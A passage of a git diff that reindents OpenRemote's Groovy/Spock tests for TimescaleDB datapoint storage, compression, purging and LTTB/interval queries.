+          datapoints.add(new ValueDatapoint<>(timestamp, 100.0 + assetIndex + index))
         }
+        assetDatapointService.upsertValues(asset.id, attributeName, datapoints)
+      }
+    }
 
-        def insertEndTime = System.currentTimeMillis()
-        def insertDuration = (insertEndTime - insertStartTime) / 1000.0
-        getLOG().info("Finished inserting ${totalDatapoints} datapoints in ${insertDuration} seconds")
+    def insertEndTime = System.currentTimeMillis()
+    def insertDuration = (insertEndTime - insertStartTime) / 1000.0
+    getLOG().info("Finished inserting ${totalDatapoints} datapoints in ${insertDuration} seconds")
 
-        then: "datapoints should be stored"
-        conditions.eventually {
-            def count = 0
-            attributeNames.each { attributeName ->
-                def datapoints = assetDatapointService.getDatapoints(new AttributeRef(testAsset.id, attributeName))
-                count += datapoints.size()
-            }
-            assert count >= totalDatapoints * 0.99 // Allow for 1% margin
-            getLOG().info("Verified ${count} datapoints stored")
-        }
-        countDatapoints(persistenceService, segmentDeleteAssetIds, attributeNames) == segmentDeleteDatapointsPerAttribute * attributeNames.size() * segmentDeleteAssets.size()
+    then: "datapoints should be stored"
+    conditions.eventually {
+      def count = 0
+      attributeNames.each { attributeName ->
+        def datapoints = assetDatapointService.getDatapoints(new AttributeRef(testAsset.id, attributeName))
+        count += datapoints.size()
+      }
+      assert count >= totalDatapoints * 0.99 // Allow for 1% margin
+      getLOG().info("Verified ${count} datapoints stored")
+    }
+    countDatapoints(persistenceService, segmentDeleteAssetIds, attributeNames) == segmentDeleteDatapointsPerAttribute * attributeNames.size() * segmentDeleteAssets.size()
 
-        when: "storage usage is measured before enabling hypercore"
-        def orDatabaseSizeBefore = persistenceService.doReturningTransaction { em ->
-            def query = em.createNativeQuery("""
+    when: "storage usage is measured before enabling hypercore"
+    def orDatabaseSizeBefore = persistenceService.doReturningTransaction { em ->
+      def query = em.createNativeQuery("""
                 SELECT pg_database_size(pg_database.datname)
                 FROM pg_database
                 WHERE pg_database.datname = 'openremote';
             """)
-            return query.getSingleResult() as Long
-        }
+      return query.getSingleResult() as Long
+    }
 
-        getLOG().info("\n=== Storage BEFORE Hypercore ===")
-        getLOG().info("\nDatabase size: ${String.format('%.2f MB', orDatabaseSizeBefore / (1024.0 * 1024.0))}")
+    getLOG().info("\n=== Storage BEFORE Hypercore ===")
+    getLOG().info("\nDatabase size: ${String.format('%.2f MB', orDatabaseSizeBefore / (1024.0 * 1024.0))}")
 
-        and: "compression job is called manually"
-        def job_id = persistenceService.doReturningTransaction { em ->
-            def query = em.createNativeQuery("""
+    and: "compression job is called manually"
+    def job_id = persistenceService.doReturningTransaction { em ->
+      def query = em.createNativeQuery("""
                 SELECT job_id
                 FROM timescaledb_information.jobs
                 WHERE proc_name = 'policy_compression' AND hypertable_name = 'asset_datapoint';
             """)
-            return query.getSingleResult()
-        }
+      return query.getSingleResult()
+    }
 
-        // run_job contains internal COMMIT statements, so it must be executed outside of a Hibernate transaction
-        def dataSource = persistenceService.persistenceUnitProperties.get(AvailableSettings.DATASOURCE) as javax.sql.DataSource
-        def connection = dataSource.getConnection()
-        try {
-            connection.setAutoCommit(true)
-            def stmt = connection.prepareCall("CALL public.run_job(?)")
-            stmt.setInt(1, job_id as int)
-            stmt.execute()
-            stmt.close()
-        } finally {
-            connection.close()
-        }
+    // run_job contains internal COMMIT statements, so it must be executed outside of a Hibernate transaction
+    def dataSource = persistenceService.persistenceUnitProperties.get(AvailableSettings.DATASOURCE) as javax.sql.DataSource
+    def connection = dataSource.getConnection()
+    try {
+      connection.setAutoCommit(true)
+      def stmt = connection.prepareCall("CALL public.run_job(?)")
+      stmt.setInt(1, job_id as int)
+      stmt.execute()
+      stmt.close()
+    } finally {
+      connection.close()
+    }
 
-        def orDatabaseSizeAfter = persistenceService.doReturningTransaction { em ->
-            def query = em.createNativeQuery("""
+    def orDatabaseSizeAfter = persistenceService.doReturningTransaction { em ->
+      def query = em.createNativeQuery("""
                 SELECT pg_database_size(pg_database.datname)
                 FROM pg_database
                 WHERE pg_database.datname = 'openremote';
             """)
-            return query.getSingleResult() as Long
-        }
+      return query.getSingleResult() as Long
+    }
 
-        getLOG().info("\n=== Storage AFTER Hypercore ===")
-        getLOG().info("\nDatabase size: ${String.format('%.2f MB', orDatabaseSizeAfter / (1024.0 * 1024.0))}")
+    getLOG().info("\n=== Storage AFTER Hypercore ===")
+    getLOG().info("\nDatabase size: ${String.format('%.2f MB', orDatabaseSizeAfter / (1024.0 * 1024.0))}")
 
-        then: "storage should be smaller after hypercore"
-        orDatabaseSizeBefore > orDatabaseSizeAfter
+    then: "storage should be smaller after hypercore"
+    orDatabaseSizeBefore> orDatabaseSizeAfter
 
-        when: "the segment-delete assets are deleted from compressed chunks with a low decompression limit"
-        setMaxTuplesDecompressedPerDmlTransaction(persistenceService, 100)
-        def segmentDeleteSucceeded = assetStorageService.delete(segmentDeleteAssetIds)
-        def segmentDeleteDatapointsAfterDelete = countDatapoints(persistenceService, segmentDeleteAssetIds, attributeNames)
+    when: "the segment-delete assets are deleted from compressed chunks with a low decompression limit"
+    setMaxTuplesDecompressedPerDmlTransaction(persistenceService, 100)
+    def segmentDeleteSucceeded = assetStorageService.delete(segmentDeleteAssetIds)
+    def segmentDeleteDatapointsAfterDelete = countDatapoints(persistenceService, segmentDeleteAssetIds, attributeNames)
 
-        then: "TimescaleDB should delete full segments without decompressing chunks"
-        segmentDeleteSucceeded
-        segmentDeleteDatapointsAfterDelete == 0
+    then: "TimescaleDB should delete full segments without decompressing chunks"
+    segmentDeleteSucceeded
+    segmentDeleteDatapointsAfterDelete == 0
 
-        when: "Purging will be called, count datapoints before purging"
-        def countBeforePurge = 0
-        attributeNames.each { attributeName ->
-            def dataPoints = assetDatapointService.getDatapoints(new AttributeRef(testAsset.id, attributeName))
-            countBeforePurge += dataPoints.size()
-        }
-        getLOG().info("Datapoints before purge: ${countBeforePurge}")
+    when: "Purging will be called, count datapoints before purging"
+    def countBeforePurge = 0
+    attributeNames.each { attributeName ->
+      def dataPoints = assetDatapointService.getDatapoints(new AttributeRef(testAsset.id, attributeName))
+      countBeforePurge += dataPoints.size()
+    }
+    getLOG().info("Datapoints before purge: ${countBeforePurge}")
 
-        and: "the purge routine is executed"
-        def deleteStartTime = System.currentTimeMillis()
-        assetDatapointService.purgeDataPoints()
-        def deleteEndTime = System.currentTimeMillis()
-        def deleteDuration = (deleteEndTime - deleteStartTime) / 1000.0
+    and: "the purge routine is executed"
+    def deleteStartTime = System.currentTimeMillis()
+    assetDatapointService.purgeDataPoints()
+    def deleteEndTime = System.currentTimeMillis()
+    def deleteDuration = (deleteEndTime - deleteStartTime) / 1000.0
 
-        getLOG().info("Purge completed in ${deleteDuration} seconds")
+    getLOG().info("Purge completed in ${deleteDuration} seconds")
 
-        then: "data points beyond the 4-week retention window should be purged via drop_chunks"
-        conditions.eventually {
-            def countAfterPurge = 0
-            attributeNames.each { attributeName ->
-                def dataPoints = assetDatapointService.getDatapoints(new AttributeRef(testAsset.id, attributeName))
-                countAfterPurge += dataPoints.size()
-            }
-            def deletedCount = countBeforePurge - countAfterPurge
+    then: "data points beyond the 4-week retention window should be purged via drop_chunks"
+    conditions.eventually {
+      def countAfterPurge = 0
+      attributeNames.each { attributeName ->
+        def dataPoints = assetDatapointService.getDatapoints(new AttributeRef(testAsset.id, attributeName))
+        countAfterPurge += dataPoints.size()
+      }
+      def deletedCount = countBeforePurge - countAfterPurge
 
-            getLOG().info("Datapoints after purge: ${countAfterPurge}")
-            getLOG().info("Deleted ${deletedCount} datapoints")
-            getLOG().info("Deletion rate: ${String.format('%.0f', deletedCount / deleteDuration)} datapoints/second")
+      getLOG().info("Datapoints after purge: ${countAfterPurge}")
+      getLOG().info("Deleted ${deletedCount} datapoints")
+      getLOG().info("Deletion rate: ${String.format('%.0f', deletedCount / deleteDuration)} datapoints/second")
 
-            // With 365 days of data and 4-week (28-day) retention, most data should be purged
-            assert countAfterPurge < countBeforePurge
-            assert countAfterPurge >= expectedRecentDatapoints
-            assert deletedCount > 0
-        }
+      // With 365 days of data and 4-week (28-day) retention, most data should be purged
+      assert countAfterPurge <countBeforePurge
+      assert countAfterPurge >= expectedRecentDatapoints
+      assert deletedCount> 0
+    }
 
-        when: "storage usage is measured after deletion"
-        def orDatabaseSizeAfterDeletion = persistenceService.doReturningTransaction { em ->
-            def query = em.createNativeQuery("""
+    when: "storage usage is measured after deletion"
+    def orDatabaseSizeAfterDeletion = persistenceService.doReturningTransaction { em ->
+      def query = em.createNativeQuery("""
                 SELECT pg_database_size(pg_database.datname)
                 FROM pg_database
                 WHERE pg_database.datname = 'openremote';
             """)
-            return query.getSingleResult() as Long
-        }
-
-        getLOG().info("\n=== Storage AFTER Deletion ===")
-        getLOG().info("\nDatabase size: ${String.format('%.2f MB', orDatabaseSizeAfterDeletion / (1024.0 * 1024.0))}")
-
-        then: "final storage should be measured"
-        true
-
-        when: "final verification of remaining datapoints"
-        def finalCount = 0
-        attributeNames.each { attributeName ->
-            def datapoints = assetDatapointService.getDatapoints(new AttributeRef(testAsset.id, attributeName))
-            finalCount += datapoints.size()
-        }
-        def actualDeleted = countBeforePurge - finalCount
-        def compressionRatio = ((orDatabaseSizeBefore - orDatabaseSizeAfter) / (double) orDatabaseSizeBefore) * 100
-
-        getLOG().info("\n=== Final Summary ===")
-        getLOG().info("Total datapoints inserted: ${totalDatapoints}")
-        getLOG().info("Datapoints before purge: ${countBeforePurge}")
-        getLOG().info("Datapoints deleted by purge: ${actualDeleted}")
-        getLOG().info("Datapoints remaining: ${finalCount}")
-        getLOG().info("Deletion percentage: ${String.format('%.2f', (actualDeleted / totalDatapoints * 100.0))}%")
-        getLOG().info("\nStorage Summary:")
-        getLOG().info("  Before hypercore: ${String.format('%.2f MB', orDatabaseSizeBefore / (1024.0 * 1024.0))}")
-        getLOG().info("  After hypercore:  ${String.format('%.2f MB', orDatabaseSizeAfter / (1024.0 * 1024.0))}")
-        getLOG().info("  After deletion:   ${String.format('%.2f MB', orDatabaseSizeAfterDeletion / (1024.0 * 1024.0))}")
-        getLOG().info("\nPerformance Summary:")
-        getLOG().info("  Insert time: ${insertDuration} seconds")
-        getLOG().info("  Purge time: ${deleteDuration} seconds")
-        getLOG().info("  Compression: ${String.format('%.2f', compressionRatio)}%")
-
-        then: "No exception should have occurred"
-        true
-
-        cleanup: "restore TimescaleDB decompression limit"
-        if (persistenceService != null && originalMaxTuplesDecompressedPerDmlTransaction != null) {
-            setMaxTuplesDecompressedPerDmlTransaction(persistenceService, originalMaxTuplesDecompressedPerDmlTransaction)
-        }
+      return query.getSingleResult() as Long
     }
 
-    private static Attribute<?>[] numberAttributes(List<String> attributeNames) {
-        return attributeNames.collect { new Attribute<>(it, ValueType.NUMBER) } as Attribute<?>[]
-    }
+    getLOG().info("\n=== Storage AFTER Deletion ===")
+    getLOG().info("\nDatabase size: ${String.format('%.2f MB', orDatabaseSizeAfterDeletion / (1024.0 * 1024.0))}")
 
-    private static long countDatapoints(PersistenceService persistenceService, List<String> assetIds, List<String> attributeNames) {
-        return persistenceService.doReturningTransaction { em ->
-            def query = em.createNativeQuery("""
+    then: "final storage should be measured"
+    true
+
+    when: "final verification of remaining datapoints"
+    def finalCount = 0
+    attributeNames.each { attributeName ->
+      def datapoints = assetDatapointService.getDatapoints(new AttributeRef(testAsset.id, attributeName))
+      finalCount += datapoints.size()
+    }
+    def actualDeleted = countBeforePurge - finalCount
+    def compressionRatio = ((orDatabaseSizeBefore - orDatabaseSizeAfter) / (double) orDatabaseSizeBefore) * 100
+
+    getLOG().info("\n=== Final Summary ===")
+    getLOG().info("Total datapoints inserted: ${totalDatapoints}")
+    getLOG().info("Datapoints before purge: ${countBeforePurge}")
+    getLOG().info("Datapoints deleted by purge: ${actualDeleted}")
+    getLOG().info("Datapoints remaining: ${finalCount}")
+    getLOG().info("Deletion percentage: ${String.format('%.2f', (actualDeleted / totalDatapoints * 100.0))}%")
+    getLOG().info("\nStorage Summary:")
+    getLOG().info("  Before hypercore: ${String.format('%.2f MB', orDatabaseSizeBefore / (1024.0 * 1024.0))}")
+    getLOG().info("  After hypercore:  ${String.format('%.2f MB', orDatabaseSizeAfter / (1024.0 * 1024.0))}")
+    getLOG().info("  After deletion:   ${String.format('%.2f MB', orDatabaseSizeAfterDeletion / (1024.0 * 1024.0))}")
+    getLOG().info("\nPerformance Summary:")
+    getLOG().info("  Insert time: ${insertDuration} seconds")
+    getLOG().info("  Purge time: ${deleteDuration} seconds")
+    getLOG().info("  Compression: ${String.format('%.2f', compressionRatio)}%")
+
+    then: "No exception should have occurred"
+    true
+
+    cleanup: "restore TimescaleDB decompression limit"
+    if (persistenceService != null && originalMaxTuplesDecompressedPerDmlTransaction != null) {
+      setMaxTuplesDecompressedPerDmlTransaction(persistenceService, originalMaxTuplesDecompressedPerDmlTransaction)
+    }
+  }
+
+  private static Attribute<?>[] numberAttributes(List<String> attributeNames) {
+    return attributeNames.collect { new Attribute<>(it, ValueType.NUMBER) } as Attribute<?>[]
+  }
+
+  private static long countDatapoints(PersistenceService persistenceService, List<String> assetIds, List<String> attributeNames) {
+    return persistenceService.doReturningTransaction { em ->
+      def query = em.createNativeQuery("""
                 SELECT count(*)
                 FROM asset_datapoint
                 WHERE entity_id = ANY(string_to_array(:assetIds, ','))
                   AND attribute_name = ANY(string_to_array(:attributeNames, ','));
             """)
-            query.setParameter("assetIds", assetIds.join(","))
-            query.setParameter("attributeNames", attributeNames.join(","))
-            return (query.getSingleResult() as Number).longValue()
-        }
+      query.setParameter("assetIds", assetIds.join(","))
+      query.setParameter("attributeNames", attributeNames.join(","))
+      return (query.getSingleResult() as Number).longValue()
     }
+  }
 
-    private static String getMaxTuplesDecompressedPerDmlTransaction(PersistenceService persistenceService) {
-        return persistenceService.doReturningTransaction { em ->
-            em.createNativeQuery("SHOW timescaledb.max_tuples_decompressed_per_dml_transaction").getSingleResult() as String
-        }
+  private static String getMaxTuplesDecompressedPerDmlTransaction(PersistenceService persistenceService) {
+    return persistenceService.doReturningTransaction { em ->
+      em.createNativeQuery("SHOW timescaledb.max_tuples_decompressed_per_dml_transaction").getSingleResult() as String
     }
+  }
 
-    private static void setMaxTuplesDecompressedPerDmlTransaction(PersistenceService persistenceService, Object limit) {
-        persistenceService.doTransaction { em ->
-            def query = em.createNativeQuery("SELECT set_config('timescaledb.max_tuples_decompressed_per_dml_transaction', :limit, false)")
-            query.setParameter("limit", limit.toString())
-            query.getSingleResult()
-        }
+  private static void setMaxTuplesDecompressedPerDmlTransaction(PersistenceService persistenceService, Object limit) {
+    persistenceService.doTransaction { em ->
+      def query = em.createNativeQuery("SELECT set_config('timescaledb.max_tuples_decompressed_per_dml_transaction', :limit, false)")
+      query.setParameter("limit", limit.toString())
+      query.getSingleResult()
     }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AssetDatapointQueryTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AssetDatapointQueryTest.groovy
@@ -50,501 +50,535 @@ import java.time.temporal.ChronoUnit
 
 class AssetDatapointQueryTest extends Specification implements ManagerContainerTrait {
 
-    def "Test lttb datapoint query"() {
+  def "Test lttb datapoint query"() {
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    given: "expected conditions"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
-        assetDatapointService.maxAmountOfQueryPoints = 1000
-
-
-        when: "requesting the first light asset in City realm"
-        def asset = assetStorageService.find(
-                new AssetQuery()
-                        .types(LightAsset.class)
-                        .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
-                        .names("Light 1")
-        )
-
-        then: "asset should exist and be correct"
-        def assetName = "Light 1"
-        def attributeName = "brightness"
-        def dateTime = LocalDateTime.now()
-        assert asset != null // light 1, 2 and 3
-        assert asset.name == assetName
-        assert asset.attributes.has(attributeName)
-
-        and: "no datapoints should exist"
-        conditions.eventually {
-            def datapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
-            assert datapoints.isEmpty()
-        }
+    and: "the container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetDatapointService = container.getService(AssetDatapointService.class)
+    assetDatapointService.maxAmountOfQueryPoints = 1000
 
 
-        /* ------------------------- */
-
-        when: "datapoints are added to the asset"
-        assetDatapointService.upsertValues(asset.getId(), attributeName,
-            [
-                    new ValueDatapoint<>(dateTime.minusMinutes(25).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 50d),
-                    new ValueDatapoint<>(dateTime.minusMinutes(20).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 40d),
-                    new ValueDatapoint<>(dateTime.minusMinutes(15).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 30d),
-                    new ValueDatapoint<>(dateTime.minusMinutes(10).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 20d),
-                    new ValueDatapoint<>(dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 10d),
-            ]
-        )
-
-        then: "datapoints should exist"
-        def allDatapoints = new ArrayList<ValueDatapoint>()
-        conditions.eventually {
-            allDatapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
-            assert allDatapoints.size() == 5
-        }
-
-        /* ------------------------- */
-
-        and: "requesting 50 datapoints using the LTTB algorithm should return 5 values"
-        def lttbDatapoints1 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointLTTBQuery(dateTime.minusMinutes(30), dateTime, 5)
-        )
-        assert lttbDatapoints1.size() == 5
-
-        and: "the 5 values are equal to 5 values in 'allDatapoints'"
-        def index = 0
-        Collections.reverse(allDatapoints) // since they're returned in reverse other (from new to old)
-        allDatapoints.stream().forEach {dp -> {
-            assert dp.timestamp == lttbDatapoints1[index].timestamp
-            assert dp.value == lttbDatapoints1[index].value
-            index++
-        }}
-
-        and: "requesting 3 datapoints using LTTB should return 50, 40 and 10 to reflect the algorithm spec."
-        def lttbDatapoints2 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointLTTBQuery(dateTime.minusMinutes(30), dateTime, 3)
-        )
-        assert lttbDatapoints2.size() == 3
-        assert lttbDatapoints2[0].value == 50d
-        assert lttbDatapoints2[1].value == 40d
-        assert lttbDatapoints2[2].value == 10d
-
-
-        /* ------------------------- */
-
-        when: "the datapoints are cleared"
-        assetDatapointService.purgeDataPoints()
-
-        and: "datapoints are added that have a spike in value, it should be included in any downsample"
-        assetDatapointService.upsertValues(asset.getId(), attributeName,
-            [
-                // placing them in a random order to verify order that is returned with the query
-                new ValueDatapoint<>(dateTime.minusMinutes(10).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 25d),
-                new ValueDatapoint<>(dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 30d),
-                new ValueDatapoint<>(dateTime.minusMinutes(30).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 10d),
-                new ValueDatapoint<>(dateTime.minusMinutes(20).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 90d),
-                new ValueDatapoint<>(dateTime.minusMinutes(25).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 15d),
-                new ValueDatapoint<>(dateTime.minusMinutes(15).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 20d),
-            ]
-        )
-
-        then: "the spike should be present as the 2nd value"
-        def lttbDatapoints3 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointLTTBQuery(dateTime.minusMinutes(60), dateTime, 4)
-        )
-        assert lttbDatapoints3.size() == 4
-        assert lttbDatapoints3[0].value == 10d
-        assert lttbDatapoints3[1].value == 90d
-        assert lttbDatapoints3[2].value == 20d
-        assert lttbDatapoints3[3].value == 30d
-
-        and: "returned datapoints should be in chronological order" // so from earliest to most recent
-        def index2 = 0
-        lttbDatapoints3.toList().stream().forEach { dp -> {
-            if(index2 > 0) {
-                assert dp.timestamp > lttbDatapoints3[index2 - 1].timestamp
-            }
-            index2++
-        }}
-    }
-
-
-
-    def "Lttb should not accept anything else than boolean and number"() {
-
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
-        assetDatapointService.maxAmountOfQueryPoints = 1000
-
-        when: "a thing asset is added to the building realm"
-        def thingId = UniqueIdentifierGenerator.generateId("TestThing")
-        def thingAsset = new ThingAsset("TestThing")
-                .setId(thingId)
-                .setRealm(keycloakTestSetup.realmBuilding.name)
-                .setLocation(new GeoJSONPoint(0, 0))
-                .addAttributes(
-                        new Attribute<>("status", ValueType.BOOLEAN, null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS)),
-                        new Attribute<>("deviceId", ValueType.TEXT, null).addMeta(new MetaItem<>(MetaItemType.STORE_DATA_POINTS)),
-                )
-        thingAsset = assetStorageService.merge(thingAsset)
-
-        and: "add datapoints to the attributes"
-        assetDatapointService.upsertValue(thingAsset.getId(), "status", true, LocalDateTime.now())
-        assetDatapointService.upsertValue(thingAsset.getId(), "deviceId", "abcdefghijklmnopqrstuvwxyz", LocalDateTime.now())
-
-
-        then: "datapoints should exist"
-        conditions.eventually {
-            def booleanDatapoints = assetDatapointService.getDatapoints(new AttributeRef(thingAsset.getId(), "status"))
-            assert booleanDatapoints.size() == 1
-            def textDatapoints = assetDatapointService.getDatapoints(new AttributeRef(thingAsset.getId(), "deviceId"))
-            assert textDatapoints.size() == 1
-        }
-
-        and: "lttbQuery with boolean should not throw exception"
-        conditions.eventually {
-            def lttbDatapoints = assetDatapointService.queryDatapoints(
-                    thingAsset.getId(),
-                    thingAsset.getAttribute("status").orElseThrow({ new RuntimeException("Missing attribute") }),
-                    new AssetDatapointLTTBQuery(LocalDateTime.now().minusMinutes(5), LocalDateTime.now(), 3)
+    when: "requesting the first light asset in City realm"
+    def asset = assetStorageService.find(
+            new AssetQuery()
+            .types(LightAsset.class)
+            .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
+            .names("Light 1")
             )
-            assert lttbDatapoints.size() == 1
-            assert lttbDatapoints[0].value == 1.0 // Aka true as boolean
-        }
 
-        when: "lttbQuery is created with text, it should throw exception"
-        assetDatapointService.queryDatapoints(
-                thingAsset.getId(),
-                thingAsset.getAttribute("deviceId").orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointLTTBQuery(LocalDateTime.now().minusMinutes(5), LocalDateTime.now(), 3)
-        )
+    then: "asset should exist and be correct"
+    def assetName = "Light 1"
+    def attributeName = "brightness"
+    def dateTime = LocalDateTime.now()
+    assert asset != null // light 1, 2 and 3
+    assert asset.name == assetName
+    assert asset.attributes.has(attributeName)
 
-        then: "exception to be thrown"
-        IllegalStateException ex = thrown(IllegalStateException)
-        assert ex.getMessage() == "Query of type LTTB requires either a number or a boolean attribute."
+    and: "no datapoints should exist"
+    conditions.eventually {
+      def datapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
+      assert datapoints.isEmpty()
     }
 
 
+    /* ------------------------- */
 
-    def "Interval query should be returned correctly and in chronological order"() {
+    when: "datapoints are added to the asset"
+    assetDatapointService.upsertValues(asset.getId(), attributeName,
+            [
+              new ValueDatapoint<>(dateTime.minusMinutes(25).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 50d),
+              new ValueDatapoint<>(dateTime.minusMinutes(20).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 40d),
+              new ValueDatapoint<>(dateTime.minusMinutes(15).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 30d),
+              new ValueDatapoint<>(dateTime.minusMinutes(10).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 20d),
+              new ValueDatapoint<>(dateTime.minusMinutes(5).atZone(ZoneId.systemDefault()).toInstant().toEpochMilli(), 10d),
+            ]
+            )
 
-        given: "expected conditions"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-
-        and: "the container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetDatapointService = container.getService(AssetDatapointService.class)
-        assetDatapointService.maxAmountOfQueryPoints = 1000
-
-
-        when: "requesting the first light asset in City realm"
-        def asset = assetStorageService.find(
-                new AssetQuery()
-                        .types(LightAsset.class)
-                        .realm(new RealmPredicate(keycloakTestSetup.realmCity.name))
-                        .names("Light 1")
-        )
-
-        then: "asset should exist and be correct"
-        def assetName = "Light 1"
-        def attributeName = "brightness"
-        def dateTime = LocalDateTime.of(2025, Month.AUGUST, 7, 9, 00);
-        def queryTime30 = dateTime.minus(30, ChronoUnit.MINUTES)
-        def queryTime60 = dateTime.minus(60, ChronoUnit.MINUTES)
-        def queryTimeNow = dateTime
-        def time30 = queryTime30.atZone(ZoneId.systemDefault()).toInstant()
-        def time60 = queryTime60.atZone(ZoneId.systemDefault()).toInstant()
-        def timeNow = queryTimeNow.atZone(ZoneId.systemDefault()).toInstant()
-        assert asset != null // light 1, 2 and 3
-        assert asset.name == assetName
-        assert asset.attributes.has(attributeName)
-
-        and: "no datapoints should exist"
-        conditions.eventually {
-            def datapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
-            assert datapoints.isEmpty()
-        }
-
-
-        /* ------------------------- */
-
-        when: "the first datapoints are added to the asset in random order"
-        assetDatapointService.upsertValue(asset.getId(), attributeName, 25d, dateTime.minus(10, ChronoUnit.MINUTES))
-        assetDatapointService.upsertValue(asset.getId(), attributeName, 30d, dateTime.minus(5, ChronoUnit.MINUTES))
-        assetDatapointService.upsertValue(asset.getId(), attributeName, 10d, dateTime.minus(30, ChronoUnit.MINUTES))
-        assetDatapointService.upsertValue(asset.getId(), attributeName, 90d, dateTime.minus(20, ChronoUnit.MINUTES))
-        assetDatapointService.upsertValue(asset.getId(), attributeName, 15d, dateTime.minus(25, ChronoUnit.MINUTES))
-        assetDatapointService.upsertValue(asset.getId(), attributeName, 20d, dateTime.minus(15, ChronoUnit.MINUTES))
-
-        then: "datapoints should exist"
-        def allDatapoints = new ArrayList<AssetDatapoint>()
-        conditions.eventually {
-            allDatapoints = assetDatapointService.getDatapoints(new AttributeRef(asset.getId(), attributeName))
-            assert allDatapoints.size() == 6
-        }
-
-        /* ------------------------- */
-
-        and: "returned datapoints (without gapfill) should be in chronological order" // so from earliest to most recent
-        def intervalDatapoints1 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointIntervalQuery(queryTime60, queryTimeNow, "1 minute", AssetDatapointIntervalQuery.Formula.AVG, false)
-        )
-        assert intervalDatapoints1.size() == 6
-        def index = 0
-        intervalDatapoints1.toList().stream().forEach { dp -> {
-            if(index > 0) {
-                assert dp.timestamp > intervalDatapoints1[index - 1].timestamp
-            }
-            index++
-        }}
-
-        and: "returned datapoints (with gapfill) should be in chronological order" // so from earliest to most recent
-        def intervalDatapoints2 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointIntervalQuery(queryTime60, queryTimeNow, "1 minute", AssetDatapointIntervalQuery.Formula.AVG, true)
-        )
-        assert intervalDatapoints2.size() == 61 // because 60/1=60, plus an extra datapoint for the spare milliseconds of time
-        def index2 = 0
-        intervalDatapoints2.toList().stream().forEach { dp -> {
-            if(index2 > 0) {
-                assert dp.timestamp > intervalDatapoints2[index2 - 1].timestamp
-            }
-            index2++
-        }}
-
-        when: "requesting interval datapoints using DIFFERENCE"
-        def diffDatapoints1 = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                asset.getAttribute(attributeName).orElseThrow({ new RuntimeException("Missing attribute") }),
-                new AssetDatapointIntervalQuery(queryTime30, queryTimeNow, "5 minutes", AssetDatapointIntervalQuery.Formula.DIFFERENCE, true)
-        )
-
-        then: "DIFFERENCE datapoints should be correct"
-        assert diffDatapoints1.size() == 7 // Because 30/5=6, plus an extra datapoint for the spare milliseconds of time.
-        assert diffDatapoints1[0].timestamp == time30.toEpochMilli()
-        assert diffDatapoints1[1].timestamp == time30.plus(5, ChronoUnit.MINUTES).toEpochMilli()
-        assert diffDatapoints1[2].timestamp == time30.plus(10, ChronoUnit.MINUTES).toEpochMilli()
-        assert diffDatapoints1[3].timestamp == time30.plus(15, ChronoUnit.MINUTES).toEpochMilli()
-        assert diffDatapoints1[4].timestamp == time30.plus(20, ChronoUnit.MINUTES).toEpochMilli()
-        assert diffDatapoints1[5].timestamp == time30.plus(25, ChronoUnit.MINUTES).toEpochMilli()
-        assert diffDatapoints1[6].timestamp == timeNow.toEpochMilli()
